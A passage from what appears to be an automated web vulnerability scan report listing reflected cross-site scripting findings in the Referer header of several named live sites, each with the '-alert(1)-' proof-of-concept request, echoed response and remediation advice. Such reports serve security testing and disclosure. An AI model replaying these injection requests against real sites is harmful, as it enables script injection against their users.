="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/hostlist.ashx&he=de.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=e45d9'-alert(1)-'4b50bf8581f&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=07626285-c0ff-437f-958c-dcbbd088dd7f';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

4.925. http://dk.imlive.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://dk.imlive.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c15d'-alert(1)-'545d614c845 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=8c15d'-alert(1)-'545d614c845

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=mw4rtt55tfb3b345unpsg3bl; path=/; HttpOnly
Set-Cookie: pdk=; expires=Thu, 27-Jan-2011 14:17:09 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=mw4rtt55tfb3b345unpsg3bl; path=/; HttpOnly
Set-Cookie: pdk=; expires=Thu, 27-Jan-2011 14:17:09 GMT; path=/
Set-Cookie: spvdr=vd=6f35da7a-dc76-47e3-98a4-e43628726799&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:09 GMT; path=/
Set-Cookie: idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:08 GMT
Connection: close
Content-Length: 17947
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=dk.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=8c15d'-alert(1)-'545d614c845&iy=dallas&id=44&iu=1&vd=6f35da7a-dc76-47e3-98a4-e43628726799';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.926. http://dk.imlive.com/waccess/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://dk.imlive.com
Path:   /waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58ec0'-alert(1)-'1ca19f61f52 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /waccess/ HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=58ec0'-alert(1)-'1ca19f61f52

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=3art1xq5rk2h0l45whar1iir; path=/; HttpOnly
Set-Cookie: pdk=; expires=Thu, 27-Jan-2011 14:17:14 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=3art1xq5rk2h0l45whar1iir; path=/; HttpOnly
Set-Cookie: pdk=; expires=Thu, 27-Jan-2011 14:17:14 GMT; path=/
Set-Cookie: spvdr=vd=76cd456c-f3e0-433a-8774-56766a677704&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:14 GMT; path=/
Set-Cookie: idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:13 GMT
Connection: close
Content-Length: 220246
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d
...[SNIP]...
="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/hostlist.ashx&he=dk.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=58ec0'-alert(1)-'1ca19f61f52&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=76cd456c-f3e0-433a-8774-56766a677704';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

4.927. http://es.imlive.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://es.imlive.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ef76'-alert(1)-'7097e4ccd25 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=6ef76'-alert(1)-'7097e4ccd25

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=zuzkb455ihqfoc55yv0wku45; path=/; HttpOnly
Set-Cookie: pes=; expires=Thu, 27-Jan-2011 14:17:11 GMT; path=/
Set-Cookie: ASP.NET_SessionId=zuzkb455ihqfoc55yv0wku45; path=/; HttpOnly
Set-Cookie: pes=; expires=Thu, 27-Jan-2011 14:17:11 GMT; path=/
Set-Cookie: spvdr=vd=2550678d-c9a3-476d-862b-ab4b8888cd75&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:11 GMT; path=/
Set-Cookie: ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:10 GMT
Connection: close
Content-Length: 18390
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=es.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=6ef76'-alert(1)-'7097e4ccd25&iy=dallas&id=44&iu=1&vd=2550678d-c9a3-476d-862b-ab4b8888cd75';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.928. http://es.imlive.com/waccess/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://es.imlive.com
Path:   /waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 751a4'-alert(1)-'3e6a4981811 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /waccess/ HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=751a4'-alert(1)-'3e6a4981811

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ly2txpzezmcm5155sslifc45; path=/; HttpOnly
Set-Cookie: pes=; expires=Thu, 27-Jan-2011 14:17:19 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ly2txpzezmcm5155sslifc45; path=/; HttpOnly
Set-Cookie: pes=; expires=Thu, 27-Jan-2011 14:17:19 GMT; path=/
Set-Cookie: spvdr=vd=ff1efd09-20e4-4d52-8133-071e0b292933&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:19 GMT; path=/
Set-Cookie: ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:18 GMT
Connection: close
Content-Length: 211707
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d
...[SNIP]...
="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/hostlist.ashx&he=es.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=751a4'-alert(1)-'3e6a4981811&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=ff1efd09-20e4-4d52-8133-071e0b292933';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

4.929. http://fr.imlive.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fr.imlive.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8655a'-alert(1)-'b1450d4e902 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=8655a'-alert(1)-'b1450d4e902

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=n3rd2q45ehprj445d1b53wnr; path=/; HttpOnly
Set-Cookie: pfr=; expires=Thu, 27-Jan-2011 14:17:20 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=n3rd2q45ehprj445d1b53wnr; path=/; HttpOnly
Set-Cookie: pfr=; expires=Thu, 27-Jan-2011 14:17:20 GMT; path=/
Set-Cookie: spvdr=vd=66658cff-7513-44e5-b0ab-43cb696f464f&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:20 GMT; path=/
Set-Cookie: ifr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:20 GMT
Connection: close
Content-Length: 18603
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-FR" lang="fr-FR" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=fr.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=8655a'-alert(1)-'b1450d4e902&iy=dallas&id=44&iu=1&vd=66658cff-7513-44e5-b0ab-43cb696f464f';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.930. http://fr.imlive.com/waccess/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fr.imlive.com
Path:   /waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82729'-alert(1)-'0751f493bff was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=82729'-alert(1)-'0751f493bff

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=h1mmxpmwhy5mtf45pdkrf0bs; path=/; HttpOnly
Set-Cookie: pfr=; expires=Thu, 27-Jan-2011 14:17:25 GMT; path=/
Set-Cookie: ASP.NET_SessionId=h1mmxpmwhy5mtf45pdkrf0bs; path=/; HttpOnly
Set-Cookie: pfr=; expires=Thu, 27-Jan-2011 14:17:25 GMT; path=/
Set-Cookie: spvdr=vd=a562a319-9a57-49cf-9551-42caa14fd03b&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:25 GMT; path=/
Set-Cookie: ifr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:24 GMT
Connection: close
Content-Length: 21030
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-FR" lang="fr-FR" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/login.aspx&he=fr.imlive.com&ul=/webcam-login/&rf=http://www.google.com/search?hl=en^q=82729'-alert(1)-'0751f493bff&iy=dallas&id=44&iu=1&vd=a562a319-9a57-49cf-9551-42caa14fd03b';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.931. http://gr.imlive.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://gr.imlive.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28ad3'-alert(1)-'7c8c16b05d7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=28ad3'-alert(1)-'7c8c16b05d7

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=rd0er4vsfoczxdmbrfuaqi55; path=/; HttpOnly
Set-Cookie: pgr=; expires=Thu, 27-Jan-2011 14:17:24 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rd0er4vsfoczxdmbrfuaqi55; path=/; HttpOnly
Set-Cookie: pgr=; expires=Thu, 27-Jan-2011 14:17:24 GMT; path=/
Set-Cookie: spvdr=vd=5cee6a4d-0187-4b8e-8517-bb8f3cde3c02&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:24 GMT; path=/
Set-Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:24 GMT
Connection: close
Content-Length: 20541
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=gr.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=28ad3'-alert(1)-'7c8c16b05d7&iy=dallas&id=44&iu=1&vd=5cee6a4d-0187-4b8e-8517-bb8f3cde3c02';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.932. http://gr.imlive.com/waccess/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://gr.imlive.com
Path:   /waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81a10'-alert(1)-'0b760eb3fe0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /waccess/ HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=81a10'-alert(1)-'0b760eb3fe0

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=2zgid3yqvmew5czs5zzlfbfr; path=/; HttpOnly
Set-Cookie: pgr=; expires=Thu, 27-Jan-2011 14:17:30 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=2zgid3yqvmew5czs5zzlfbfr; path=/; HttpOnly
Set-Cookie: pgr=; expires=Thu, 27-Jan-2011 14:17:30 GMT; path=/
Set-Cookie: spvdr=vd=a0b49277-e905-4eb6-a507-32e282c3c02f&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:30 GMT; path=/
Set-Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:30 GMT
Connection: close
Content-Length: 253495
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d
...[SNIP]...
="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/hostlist.ashx&he=gr.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=81a10'-alert(1)-'0b760eb3fe0&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=a0b49277-e905-4eb6-a507-32e282c3c02f';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

4.933. http://ib.adnxs.com/ttj [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ttj

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ec55'-alert(1)-'3deb7da7e95 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ttj?id=57040&pubclick=http://yads.zedo.com/ads2/c%3Fa=775740%3Bn=951%3Bx=2304%3Bc=951000002,951000002%3Bg=172%3Bi=6%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=6%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=2%3Bss=2%3Bsi=6%3Bse=1%3Bk=&cb=0.14057195745408535 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=9ec55'-alert(1)-'3deb7da7e95
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=EAAYAA..; acb266870=5_[r^208WMuF4Lw)IE.8qu]==?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPyqFBR3BpJpcBWHfHSmrEEKwRUNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEsAQBAgUCAAIAAAAAHyH9zwAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296254384%29%3Buf%28%27r%27%2C+151403%2C+1296254384%29%3Bppv%2882%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2884%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2811%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2882%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2884%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2887%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3Bppv%28619%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3Bppv%28620%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3Bppv%28621%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygA